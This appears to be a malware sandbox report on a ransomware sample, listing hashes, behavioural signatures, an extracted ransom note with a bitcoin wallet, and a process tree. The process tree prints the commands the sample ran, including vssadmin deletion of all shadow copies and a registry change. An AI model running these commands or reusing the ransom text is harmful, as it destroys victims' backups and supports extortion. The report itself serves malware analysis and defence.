Overview

overview

10

Static

static

6.exe_.exe

windows7_x64

10

6.exe_.exe

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    30/10/2020, 05:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6.exe_.exe

  • Size

    26KB

  • MD5

    0f0d5631cc8749e8a8a2f61ca909dcfc

  • SHA1

    ee79e938a80d1d0a955899f56d5f8f37bee38de0

  • SHA256

    e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a

  • SHA512

    5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note
Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $200 worth of bitcoin to wallet: 3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq after payment,we will send you Decryptor software contact email: [email protected] Your personal ID: d09TwldPIleGCR2Y1zdbtIoE64jLQTrKMQfIhztxUqd4j3PCaIGCeNqrxj1ZBQa/MZd+ProqyE6NQmq7tOfrl4EtnfZn+5catCOgp8Rnohnq97ELsWjoUTXPdLejXeSbPOBXp804zv6pJuLtvO1LAfJ0qm1lMFCur0R9JSttCbA=
Wallets

3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq

Signatures

  • UAC bypass 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6.exe_.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2000
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1292
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1560
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt7
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:760
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1956

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmp

    Filesize

    2.5MB

    Download

  • memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

    Filesize

    4KB

    Download